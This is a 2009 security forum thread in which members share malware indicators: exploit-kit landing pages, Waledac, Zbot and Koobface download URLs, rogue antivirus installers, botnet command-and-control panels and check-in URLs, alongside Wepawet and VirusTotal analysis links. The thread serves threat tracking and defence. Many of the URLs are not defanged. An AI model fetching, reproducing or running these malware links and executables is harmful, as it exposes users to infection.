hxxp://91.207.4.122/spm/s_alive.php?id=816050030546&tick=3910437&ver=500&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=663551200501&tick=423109&ver=202&smtp=b
hxxp://91.207.4.122/spm/s_alive.php?id=355751445710&tick=27198703&ver=202&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=522056062568&tick=24860734&ver=500&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=605657882560&tick=1229828&ver=201&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=255660652365&tick=228672609&ver=224&smt
There used to exist in public view "91.207.4.122/status", but now he/she's "fixed" that, redirecting to cn.yahoo.com.
Google still has the cache page though:
http://74.125.77.132/search?q=cache:4eUiegnhAFgJ:91.207.4.122/status+91.207.4.122
Title: Re: daily something......
Post by: GmG on March 16, 2009, 10:11:42 am
LeFiesta Exploit
Code: [Select]
http://89.248.172.156/660/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bce9710a8cfc8452ff64a0916ebf54a4&t=1234723683&type=js
Code: [Select]
http://biglendlive.info/hitstat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2d3e1eab37b1bf8225cccc6e808f0912&t=1236937612&type=js
Code: [Select]
http://lafi.babjr.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=96051f135ea17fc81786f21d8f6315d5&t=1235407081&type=js
Code: [Select]
http://leepe.cn/cat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=cf10ba345d696fb6b4b19704eeee4866&t=1236765069&type=js
Code: [Select]
http://leepe.cn/eng/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=c866c23b22cf6c8e8f993623c5060d9e&t=1237200054&type=js
Code: [Select]
http://piratik.biz/exp/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7fba86140376a1fc3e6fa8a4e05612bf&t=1235415814&type=js
Code: [Select]
http://piratik.biz/exp5/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2aa87c66d9d626cec6793fe1cd2d75e9&t=1235415776&type=js
Code: [Select]
http://thelegion74.com/yu5/index.php

Code: [Select]
http://vippif.com/fiesta/
http://wepawet.cs.ucsb.edu/view.php?hash=a1efe8f6cb881a9fd88991f4a4b25d1f&t=1237200606&type=js
Code: [Select]
http://weblife.net23.net/
http://wepawet.cs.ucsb.edu/view.php?hash=49ecb0704f81a59636e18607087534a1&t=1237201220&type=js
Code: [Select]
http://www.thebestlog.org/cruz/
http://wepawet.cs.ucsb.edu/view.php?hash=b44dd93b6aebad5b6b6d7eec57926621&t=1234633908&type=js
Title: Re: daily something......
Post by: GmG on March 16, 2009, 11:13:45 am
Koobface

Code: [Select]
http://viewworldh.com/download/1/1000/5
http://viewworldy.com/download/1/1000/5
http://ldj5.biz/setup.exe

MBR Rootkit / Sinowal / Mebroot, new IP 76.76.22.221

Code: [Select]
http://akajjcthr.com/ld/ment/
Title: Re: daily something......
Post by: GmG on March 16, 2009, 12:51:39 pm
Code: [Select]
http://1zs0ewvqcget52rl1z1n.cn/s_t_t.php
http://2d2deozghamea1m1ifn3.cn/s_t_t.php
http://dcz9ubei212vp3nrca5i.cn/s_t_t.php
http://ddvrrflabpqcuoaexpwp.cn/s_t_t.php
http://dihbgbwqryuolfbebgme.cn/s_t_t.php
http://egntxselsaossawilurx.cn/s_t_t.php
http://fcsvjiajnerwjjmtnfzu.cn/s_t_t.php
http://hsyzpbavkojdqclhnoqz.cn/s_t_t.php
http://ivdqvmbxktixdpleamjg.cn/s_t_t.php
http://jetvokzbdgktxubiiphn.cn/s_t_t.php
http://lmempodfzrqqkteyupar.cn/s_t_t.php
http://lufwhtelkadvrtaukqjo.cn/s_t_t.php
http://qjiv7qj4irh2f1o2v8sm.cn/s_t_t.php
http://tckeblkiumuhysrwqlev.cn/s_t_t.php
http://xbfnyukgdoqrjrsfmcdm.cn/s_t_t.php
http://xpehbam.cn/s_t_t.php
http://zjjrrhhuokjxgmulisxs.cn/s_t_t.php
http://znchygdrmelzejjvofji.cn/s_t_t.php
http://zteersxhgcddtfktecrq.cn/s_t_t.php
http://wepawet.iseclab.org/view.php?hash=de7f0c270430a281f48625fee7166324&t=1237203611&type=js

Code: [Select]
http://234954382524.cn
http://wepawet.iseclab.org/view.php?hash=d37fb9bbc20226eb605422b627e757ed&t=1237203979&type=js

Code: [Select]
http://438723847234.cn/sem/index.php
http://wepawet.iseclab.org/view.php?hash=de4915ce6ed63b2670e6c810ecdd2017&t=1237204176&type=js

Code: [Select]
http://adscounter.cn/package/
http://wepawet.iseclab.org/view.php?hash=77c3b2fc8a4cc7cbf7fcdf32d0c16119&t=1237204323&type=js

Code: [Select]
http://s1.s2.s3.s4.yahoo.com.longebook.cn/qq/
http://wepawet.iseclab.org/view.php?hash=26e6cf1dc8e2ab9be7e3172208dfcb92&t=1237205518&type=js

Code: [Select]
http://foxbelive.ru/pic1/
http://foxxpriv.ru/pic1/
http://wepawet.iseclab.org/view.php?hash=36da7ee709e19b965a17a4d88306ce00&t=1237205612&type=js

Code: [Select]
http://g00gle-analyze.com/slg2/
http://wepawet.iseclab.org/view.php?hash=a8ce4d33e27b67f88cfb7ed4fe845b56&t=1237050231&type=js

Code: [Select]
http://hunters-of-darkness.de/cgi-stat/index.php
http://wepawet.iseclab.org/view.php?hash=3b376c010ae0fbc67f6edd14fa48375a&t=1237206013&type=js

Code: [Select]
http://jimmgoland.1sthost.org/filter/
http://wepawet.iseclab.org/view.php?hash=59e48910a0e080084083b3ee824ef055&t=1237206179&type=js

Code: [Select]
http://ncsmichigan.com/images/pack/index.php
http://wepawet.iseclab.org/view.php?hash=3525a035f08a9dbffd6b63f448f285b0&t=1237206521&type=js

Code: [Select]
http://telenet.kz/kabel/cer/
http://wepawet.iseclab.org/view.php?hash=33f5575880f59efb8f70e53668da2610&t=1237207441&type=js

Code: [Select]
http://chriscleaningco.com/images/
http://gifts2009.net/aga/in.php
http://gold-sutra.info/gpack/
http://php4php.xtreemhost.com/admin/
http://prostolab.net/inf/index.php
http://russiannews.ru/arabic/data/news/upload/exp/
http://prostolab.net/inf/index.php

Code: [Select]
http://e.caricare.net/e/count.php?b=1004
http://e.caricare.net/e/ii.php?b=1004
Title: Re: daily something......
Post by: SysAdMini on March 16, 2009, 02:01:58 pm
FakeAV /TDSS
Code: [Select]
user4scan.com/download/install.php
http://wepawet.iseclab.org/view.php?hash=754d4813959d15ce5863681399b81592&t=1237085096&type=js
http://www.virustotal.com/analisis/78ce7b57f666f2530e83d9301b5341c8
Title: Re: daily something......
Post by: SysAdMini on March 16, 2009, 07:17:00 pm
Thanks guys,

I'm happy to see contributing members. Keep up the good work !
Title: Re: daily something......
Post by: sparsha on March 18, 2009, 05:07:48 am
Rogue sites:

Spyware Fighter/Spy Fighter related sites

Code: [Select]
Spw-fighter.com
Spwfighter.com
Spyware-fighter.com
Spw-fight.com
Spywarefighter2009.com
Spwfight.com
Spywarefighter2k9.com
Spywarekick.com
Spywaresfighter.com
Spyfighter.biz
Spyfighter.org


http://spw-fight.com/in/4/1/1/0000000000000000
http://download.spw-fight.com/?user_id=0&sub_id=0&hash=0000000000000000
http://spwfght.com/download2.php?user=4&subid=32
http://spwfighter.com/dl/download2.php?user=4&subid=32
http://spyfighter.org/Installer.exe


Title: Re: daily something......
Post by: sparsha on March 18, 2009, 07:55:31 am
Rogue related

Code: [Select]
http://renus2008.com/renus.exe
1-renus2008.com
3-antispyware3000.net
Title: Re: daily something......
Post by: SysAdMini on March 18, 2009, 08:00:28 am
Rogue related too

Code: [Select]
go-uniq.com/in.cgi?13&gai=cspamg&gli=79
rotates to
Code: [Select]
removespywarethreats.com
desktoprepairpackage.com
pcantimalwaresolution.com

Some more at the same IPs

Code: [Select]
malwareremovingtool.com
securecleanertool.com
cleanerpcsolution.com
Title: Re: daily something......
Post by: GmG on March 18, 2009, 10:38:27 am
Code: [Select]
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://wepawet.iseclab.org/view.php?hash=8fe49cd0c89b388f76e9d3fc8d09ab6e&t=1237372107&type=js

Code: [Select]
http://aindu.cn/zz/index.php
http://wepawet.iseclab.org/view.php?hash=8bc9c4bf1530e2d953ae654caa8c2e77&t=1237372187&type=js

Code: [Select]
http://leepe.cn/eng2/index.php
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php

Code: [Select]
http://newsantimalware.com/720/
http://wepawet.iseclab.org/view.php?hash=fc40a6bb199d5c60ad8d42306e6e4756&t=1237372628&type=js

Code: [Select]
http://bdsm-movies.info/33/
http://wepawet.iseclab.org/view.php?hash=4397096bea5727c9b5b32d76b6eadbd2&t=1237372653&type=js

Code: [Select]
http://91.207.61.32/la/index.php
http://91.207.61.32/fies/index.php
http://wepawet.iseclab.org/view.php?hash=f2931444df46c8d9443abcb446b6eb8b&t=1237232079&type=js
Title: Re: daily something......
Post by: CkreM on March 18, 2009, 05:40:52 pm
Zbot IP that is on the MDL but with different directories/drop now.


Code: [Select]
http://92.62.101.61/ready/farma.exe
http://92.62.101.61/ready/data.cab
http://92.62.101.61/ready/s192.php
Title: Re: daily something......
Post by: CkreM on March 18, 2009, 11:08:38 pm
another one:

Code: [Select]

http://vse-buddet-zae.biz/daite_deneg/X/ldr.exe
http://vse-buddet-zae.biz/daite_deneg/X/config.bin
http://vse-buddet-zae.biz/daite_deneg/X/snd.php

Title: Re: daily something......
Post by: CkreM on March 19, 2009, 12:01:39 am
Code: [Select]
http://us18.ru/@/include/spl.php
leads to:
Code: [Select]
http://us18.ru/@/load.php
Title: Re: daily something......
Post by: SysAdMini on March 19, 2009, 10:51:11 am
Code: [Select]
tw.lovechina.tw.cn/count/js/gif.gif
redirects to

Code: [Select]
cqfywg.cn/count/js/swf2.htm
cqfywg.cn/count/js/old.htm
cqfywg.cn/count/js/swfobject.js
cqfywg.cn/count/js/office.htm
cqfywg.cn/count/js/06014.htm
cqfywg.cn/count/js/92.htm

http://wepawet.iseclab.org/view.php?hash=e580167b34c4d2dd3e9dbaf8be2ca752&t=1237459572&type=js
http://wepawet.iseclab.org/view.php?hash=33298d136ed48b61bab20799d076f177&t=1237459770&type=js
Title: Re: daily something......
Post by: DiFor on March 19, 2009, 12:13:20 pm
Full file list on the server with sploits:
Code: [Select]
06014.htm
92.htm
gif.gif.htm
lz.htm
lz2.htm
office.htm
old.htm
real.gif
real2.htm
sina.htm
swf.htm
swf2.htm
swfobject.js
tj.htm
UU.htm
Title: Re: daily something......
Post by: CkreM on March 19, 2009, 04:46:24 pm
Rogue

Code: [Select]
http://mostpopularscan.com/
http://fullantispywareonlinescane.com/
http://fullantispywareonlinescane.com/promo/download/trial/InstallAVg_444.exe
http://filefixpro.com
http://free-web-scaners.com/disk/?code=286


Title: Re: daily something......
Post by: sparsha on March 20, 2009, 05:03:51 am
Rogue related sites:

Code: [Select]
webscannertools.com
central-scan.com/full.exe

Fullantispywareonlinescane.com
antispywareupdateservice.com/download/security.bmp
platinumsecurityupdate.com/tsc/winsource.dll
thankyouforinstall.cn/order_xp.php?ver=444
powerfullantivirusproduct.com/order_av.php?ver=444
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 08:56:31 am
Code: [Select]
asionigolo.com/stats.php?id=21946398
leonads.com/stats-xp/1/
redirect to
Code: [Select]
84654321.cn/index.php
http://wepawet.iseclab.org/view.php?hash=a9f579db0d42f30653ad3c7470164cdb&t=1237539274&type=js
Title: Re: daily something......
Post by: sowhat-x on March 20, 2009, 09:02:34 am
Quote
hxxp://sadcwed.hostindianet.com/cache/readme.pdf

Result: 3/39 (7.7%):
http://www.virustotal.com/analisis/e0bbd1fd0710e2d670f8fb2fad822dc6

Quote
hxxp://sadcwed.hostindianet.com/cache/flash.swf

Result: 1/39 (2.57%)
http://www.virustotal.com/analisis/040394b274ccb44c3188719fd77448c8
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 10:19:42 am
Quote
hxxp://sadcwed.hostindianet.com/cache/readme.pdf

Code: [Select]
perfectnamestore.cn/in.cgi?income4
namebuyline.cn/in.cgi?income2

redirect you to this site. Some days ago they led to LuckySploit, today they lead to these exploits.
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 03:24:41 pm
Code: [Select]
nuevas-videpostales.serveftp.net/retrieve/verpostal/ActiveX-Installer.exe
http://www.virustotal.com/analisis/a81a097348e41b3b8e27f79ed612812a 9/39
MD5...: 35414bbe4473ee111f54f5369da4a453
a-squared   4.0.0.101   2009.03.20   P2P-Worm.Win32.Palevo!IK
BitDefender   7.2   2009.03.20   Worm.P2P.Agent.Q
GData   19   2009.03.20   Worm.P2P.Agent.Q
Ikarus   T3.1.1.48.0   2009.03.20   P2P-Worm.Win32.Palevo
McAfee+Artemis   5558   2009.03.19   Generic!Artemis
Microsoft   1.4502   2009.03.20   Worm:Win32/Silly_P2P.G
Prevx1   V2   2009.03.20   High Risk Cloaked Malware
Sophos   4.39.0   2009.03.20   Sus/Autorun-E
Symantec   1.4.4.12   2009.03.20   W32.SillyFDC
Title: Re: daily something......
Post by: SysAdMini on March 20, 2009, 03:47:33 pm
Code: [Select]
m.ef44ee.cn/a2/google.htm
http://wepawet.cs.ucsb.edu/view.php?hash=186377db538ece3350e1a6a5e8089c5c&t=1237563886&type=js
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 02:19:07 am
Quote
...redirect you to this site. Some days ago they led to LuckySploit, today they lead to these exploits.
There's more than one malware domain on the same IP... here's another one for example:
hxxp://ghrgt.hostindianet.com
My guess is they'll continue registering domains over it every once in a while...
http://www.robtex.com/ip/94.247.3.151.html

Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates", heh...
Title: Re: daily something......
Post by: SysAdMini on March 21, 2009, 02:26:41 am
Quote
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates", heh...

Oh yes.

http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.151#result
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 02:29:34 am
 :)

I like it when they make it easy for us...
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.150#result
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.152#result
Title: Re: daily something......
Post by: sowhat-x on March 21, 2009, 03:23:25 am
Quote
hxxp://porn-money.org/in.cgi?5
hxxp://dissolute-office.com/123.php
hxxp://gujjipuzzi.net/in.cgi?pipka
hxxp://benyodil.cn/pagess.html
hxxp://benyodil.cn/senks/al1/1/info.php
hxxp://gcounter.cn
hxxp://divinets.cn/z/5.htm
hxxp://divinets.cn/z/z.htm
hxxp://agkt.info/evo/count.php?o=4
hxxp://agkt.info/evo/exploits/x19.php?o=2&t=1237604581&i=1430963245

Quote
hxxp://tayforlive.ru/loader.exe
hxxp://20-ka.cn/bots/svchost.exe
hxxp://rampartech.com
hxxp://typyxiolix.com/stats-xp/
hxxp://84654321.cn/load.php
hxxp://pingpinghost.com/license.exe
Title: Re: daily something......
Post by: CkreM on March 21, 2009, 05:35:39 pm
some malware
Code: [Select]
http://www.milehighhomefinder.com/include/class/tinymce1/a.exe
http://c-0p.cn:6135/qwer/lzz.css
Title: Re: daily something......
Post by: CkreM on March 21, 2009, 05:47:25 pm
Ambler trojan c&c panel login:

Code: [Select]
http://www.mybussines.biz/best/admin.php
http://fixet.ru/admin.php
Title: Re: daily something......
Post by: CkreM on March 22, 2009, 09:10:47 am
rogue:

Code: [Select]
win-pc-defender.com
http://www.threatnuker.com/bin/ThreatNukerSetup.exe
Title: Re: daily something......
Post by: XiTri on March 22, 2009, 03:27:03 pm
Code: [Select]
http://judns.net/jud/pdf.php?id=124
http://judns.net/jud/pdf.php?id=111
http://judns.net/jud/load.php?id=9747&spl=2
Title: Re: daily something......
Post by: XiTri on March 22, 2009, 03:34:31 pm
The exe is pasted into a gif

Code: [Select]
ppkok.cn/file/mm.gif
http://28.16868.org/long/logo.gif
http://28.16868.org/long/logo18.gif
Title: Re: daily something......
Post by: CkreM on March 22, 2009, 04:01:19 pm
Waledac
Code: [Select]
http://duklin.againstfear.com/news.exe
Title: Re: daily something......
Post by: bobby on March 22, 2009, 07:24:33 pm
205.209.143.94/1122.htm
205.209.143.94/000f1.htm
205.209.143.94/000f2.htm

haola123123.com/7700.htm
haola123123.com/0081.htm

It seems that more domains are sharing the same files, as I got 1122.htm as a string in more than one executable, and all are requesting this file from another domain.
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 07:54:50 am
This one is quite hilarious...
Quote
hxxp://ygy.ru/index.php

DL lists...
Quote
hxxp://b.wuc7.com/tt.txt
hxxp://l.sog369.com/list.txt
hxxp://www.iukjthgvg.cn/kankan.txt

Quote
hxxp://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
hxxp://best-click-download.info/install.php ---> Spawns fake av executable...

Quote
hxxp://69.249.79.161/print.exe
-> Waledac variant:
http://www.virustotal.com/analisis/892cc1f2514f891fc20c81baa4ec1a2f

http://www.bfk.de/bfk_dnslogger_en.html?query=78.129.166.5#result
I especially enjoyed this one in particular...
Quote
hxxp://rbckc.com/redir=1566237.php
Title: Re: daily something......
Post by: sparsha on March 23, 2009, 12:30:37 pm
Code: [Select]
http://dlmaldef09.com/maldef09/install.php?track_id=10284
http://getmaldef09.com/maldef09/setup.php?track_id=10284
http://84.16.247.29/maldef09/setup.php?track_id=10284

Now time to track the "Total Security Protection" rogue throwaway sites

Code: [Select]
http://transformercity.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://antivirusonlineproscanner.com/promo/1/freescan.php?nu=880479&back==jQx3Tz2NkMOMI=N
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 01:06:55 pm
Quote
hxxp://xprotect.us/index.php?affid=02935
hxxp://personal-antivirus.com//download/PersonalAntivirus.exe
hxxp://protectprivacy18.com/maldef09_2/4/10250
hxxp://www.secure-data-group.com/

Various crap hosted on the following IPs; I've only had a really quick look at them:
some of the domains were already spotted in the past, others seem to be temporarily "inactive" or so (yeah, sure...)
http://www.bfk.de/bfk_dnslogger_en.html?query=78.26.179.189#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.40#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.41#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.42#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.126#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.127#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.128#result
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 01:14:06 pm
Code: [Select]
http://www.photogalleryy.com/image.php
Redirects to:
Code: [Select]
http://66.29.31.3/~rivux/PIC2009-02-15-JPG.exe
Code: [Select]
http://89.149.254.237/redirect.php?type=0
redirect to:
Code: [Select]
http://cancelyourdreams.cn/Installer2.exe
there is malware there from 1-6:
Code: [Select]
http://hackdownload.cn/install/1.exe

Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 02:31:31 pm
Quote
hxxp://anti-virus-2010-pro.info/install.php
hxxp://anti-virus-2010-pro-downloads.info/en/exe/install.exe
http://www.bfk.de/bfk_dnslogger_en.html?query=70.38.19.201#result
================================================

Now, if someone can explain to me what in the world the purpose of this one is...  ???
Quote
hxxp://www.anti-virus-1.net/
It loads a Kaspersky .jpg advertisement from here...
Quote
hxxp://www.vaginoplasty-1.net/AV.jpg
Which is an open dir as well...
Quote
hxxp://www.vaginoplasty-1.net/
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 04:35:21 pm
Waledac:

Code: [Select]
http://antiterrornetwork.com/run.exe
http://fearalert.com/run.exe
http://terrorfear.com/run.exe
http://antiterroris.com/run.exe
http://terroralertstatus.com/run.exe
http://chatloveonline.com/run.exe
http://lovecentralonline.com/run.exe
http://supersalesonline.com/run.exe
http://bestlifeblog.com/run.exe
http://mobilephotoblog.com/run.exe

I could sit for hours and get like 100 domains which host it ;D
Title: Re: daily something......
Post by: sowhat-x on March 23, 2009, 04:48:59 pm
Quote
I could sit for hours and get like 100 domains which host it  ;D
Lol ;-)
As a side note, the ShadowServer people are maintaining a regularly updated list of Waledac domains...
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
Title: Re: daily something......
Post by: CkreM on March 23, 2009, 04:52:34 pm
good to know  :o

I was checking domains registered on the same IP with http://www.bfk.de/bfk_dnslogger_en.html
Title: Re: daily something......
Post by: GmG on March 23, 2009, 07:03:30 pm
Rootkit TDss
Code: [Select]
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.exe

OSX/RSPlug-F (user agent=Mac OS X)
Code: [Select]
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg
http://www.virustotal.com/it/analisis/438939832ba104f34907e919bc2ddac1
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 05:23:55 am
Waledac crap... current detection rates in VirusTotal at 6/39 (15.39%), here's a sample report:
http://www.virustotal.com/analisis/fb778f91c5a76e68eddbec3955c7dd44
Quote
hxxp://24.9.38.40/save.exe
hxxp://64.95.58.150/contact.exe
hxxp://64.95.58.153/news.exe
hxxp://67.223.10.108/save.exe
hxxp://69.242.22.235/main.exe
hxxp://69.14.54.169/save.exe
hxxp://69.14.99.11/contact.exe
hxxp://98.127.138.99/print.exe
hxxp://98.127.144.188/contact.exe
hxxp://99.190.177.125/run.exe

C&C servers...
Quote
hxxp://213.155.4.80/bm/controller.php?action=bot&entity_list=
hxxp://213.155.6.32/fine/controller.php?action=bot&entity_list=

Quote
hxxp://medievalmusic.by.ru/ -> Open dir...
More crap on the same IP, spamming/phishing etc...
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
http://www.robtex.com/ip/87.242.78.57.html

It also redirects strhq.cn that was spotted previously...
Quote
hxxp://medievalmusic.by.ru/mhstchk.php
Title: Re: daily something......
Post by: SysAdMini on March 24, 2009, 07:14:57 am
Quote
It also redirects strhq.cn that was spotted previously...
Quote
hxxp://medievalmusic.by.ru/mhstchk.php

Have you seen this ?

Code: [Select]
<?php echo "<!--"."hello_my_little_friend._You_have_download_this_page_and_see_th"."is_source._We_do_not_delete_anything_only_upload_change_your_passwords_and_do_not_say_it_to_anybody"."-->"?>
Title: Re: daily something......
Post by: sowhat-x on March 24, 2009, 07:19:06 am
He-he, yeah, quite ridiculous, isn't it? And it's the "haitou.php" scumbags again...
Title: Re: daily something......
Post by: DiFor on March 24, 2009, 11:26:18 am
))
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 01:11:40 pm
In:
Code: [Select]
http://interhack777.by.ru
http://wepawet.iseclab.org/view.php?hash=083efd85e283aff8a4fd9c18839aa1cf&t=1237898209&type=js
iframe of:
Code: [Select]
http://interhack777.by.ru.33406df8d1f8b3f1.beencn.cn/china.cn/
http://wepawet.iseclab.org/view.php?hash=45dc5f553ec84eb856a67f69c4f330a0&t=1237898552&type=js

which redirects to luckysploit at:
Code: [Select]
http://193.138.172.15/salo/?t=6
http://wepawet.iseclab.org/view.php?hash=04288c0e3940bbf4229e4d19f439e43a&t=1237478938&type=js

that downloads a trojan at:
Code: [Select]
http://193.138.172.15/salo/?h=17
http://www.virustotal.com/analisis/bf83ca150e492a461d5ee61efbdb3987

another trojan that is downloaded is:
Code: [Select]
http://lousecn.cn/load/6FCF55/ie709001
http://www.virustotal.com/analisis/e437f79fac10473bf74647dcd7326662
Title: Re: daily something......
Post by: PaJamis on March 24, 2009, 03:57:52 pm
variant of Win32/Adware.Agent.NLE
Quote
hxxp://av1-click-download.info/en/PE/QWProtect.dll
http://www.virustotal.com/analisis/6374e6460d03174dc78c5a2081eeb6ce
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 04:05:35 pm
and on the same IP:

Code: [Select]
http://av1-click-site.info/
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 05:11:32 pm
Code: [Select]
http://best-tube-home.com/
http://check-ms-antivirus.com/

Both use social engineering (Media Player codec) to download from:
Code: [Select]
http://files.ms-loads-av.com/exe/setup_1_2_1.exe
only one antivirus hit:
http://www.virustotal.com/analisis/126210179d475c81a40b6a371cef7c6d
Title: Re: daily something......
Post by: CkreM on March 24, 2009, 06:27:52 pm
Redirect/Contains exploits (pdf exploit domain is on MDL)
Code: [Select]
http://bc69.by.ru
pdf exploit which it redirects to:
Code: [Select]
http://vpsspeedin.ru/1/pdf.php
http://wepawet.iseclab.org/view.php?hash=6f162c5dc313445ba755f9a799be7725&t=1237919023&type=js

downloads zbot at:
Code: [Select]
http://virtyoz.info/image/fi/load.php?id=35&spl=4
http://www.virustotal.com/analisis/ce5fe16d39d64107ad2cd6884973a4c7
Title: Re: daily something......
Post by: CM_MWR on March 24, 2009, 07:30:38 pm
Some of my dingleberries from the last few weeks  :P

Code: [Select]
193.138.172.15/salo/?147b3cce4c7a455a85f424e630027351bf0decf9f5c2b6d461921318e73373ab5e0130cfa1d11ea6c772b232b5d24e7ad2226b2dc8abc83c2ad9492b6db74993
193.138.172.15/salo/?20630100614f1cb3b7617371a94dbb01aa6d6dea5501ab9b7bf031b622f263e38c36d0fbabdd4cc02766c70ef43594ab87f95e5a6dedbb95c1c2002dc05b14ef
193.138.172.15/salo/?5d9a3d064381864ad8ed6762adf8565929609ff4ff7598a008a3221cd4f456817bb3295a4c3a96ee7340286017c5b6b22632f52f4e3129e820b07e0528d987e0
193.138.172.15/salo/?6b76746d927a2b6a6ad63796b25d9a570c150a54f2639109ac0d45a04f4a964d11024c9721a1528be007f8ad424a5c495523b1c915d1b3d370c65a64291f9df2
193.138.172.15/salo/?t=6
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053000060B10
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530060C1117
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530090F1419
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530292F3439
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530787E8389
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053083898E93
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A3A9AEB3
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A9AEB3B8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530B2B8BDC2
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000000376600000001760000005DEB000530F9FF0409
209.34.91.23/imp2/12400.php
64.225.158.70/aNI022328/?code=BundleBase1.2328
64.225.158.70/bpx/xS5PN9.exe
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530191F2429
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
84.244.138.55/ase/?17d5d5f9dd0c1644f0f6b20b74ec080c4851ccd7da471b3ffe20293cba2e2f8981cacb18bd70dcae3597fc9eeb532e5ba20ea2283c25034d7c7a97df26c2ecac
84.244.138.55/ase/?712243de3e49129542d7beaf3af5e88f733447a27f28b850760e21c47fa99c7f3b589f8d92c08a3172ca3256cdb9c70c44c67b0a8990710d9ba987d4e3acda69
84.244.138.55/ase/?8a14b1d4f1a9842e935b9c14a07a5979f6e7639d50aff7bd0ec99dbbc3c36624d75277965f27068231bc845ab36d730920afc0341b1e0912c4a41c243676b411
84.244.138.55/ase/?8ca27317863d8812f429a9eae57ac422292fe38932698e9fde1f2dd3c4bbf4a58a12642e80fa68ce4d916e93e17562fe95930129e9fd1f8ab98f7b02d272b439
84.244.138.55/ase/?h=5ac0i?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
84.244.138.55/ase/?t=3
84.244.138.55/ts/in.cgi?lapp
94.75.234.35/data/u560x417145113
94.75.234.35/html/b874550815x19
94.75.234.35/data/ffc306323898
94.75.234.35/data/u560s1x25980757
94.75.234.35/html/kpnm1225628204
athlon.sibers.com/111.exe
benyodil.cn/pages2.html
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/pdf.php
cfsiqejclo.com/progs/jokkl/aqmznana.php
cfsiqejclo.com/progs/jokkl/bxyyyyl.php
cfsiqejclo.com/progs/jokkl/cclmmmzmna
cfsiqejclo.com/progs/jokkl/dzzaaanxkx.php
cfsiqejclo.com/progs/jokkl/eoooocccpd.php?adv=adv656
cfsiqejclo.com/progs/jokkl/hhrrre.php?adv=adv656&code1=KNIH&code2=0154&id=-1331090992&p=0
cfsiqejclo.com/progs/jokkl/liivvwf.php
cfsiqejclo.com/progs/jokkl/qmzhr.php
cfsiqejclo.com/progs/jokkl/vrrsfssgt.php
cfsiqejclo.com/uniq.php?id=-1331090992&p=0
ctfmon.info/cd/cd.php?id=&ver=nz0
ctfmon.info/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
ctfmon.info/cd/uns.php?id=&ver=nz0
dfhatnjfjw.net/ccsuper0.php
dfhatnjfjw.net/ccsuper1.php
dfhatnjfjw.net/ccsuper2.php
divinets.cn/xts/in.cgi?7
divinets.cn/z/1.htm
excelsystems.cn/soft.php?aid=0860&d=1&refer=be4f5fba9
firstgate.ru/33/cache/flash.swf
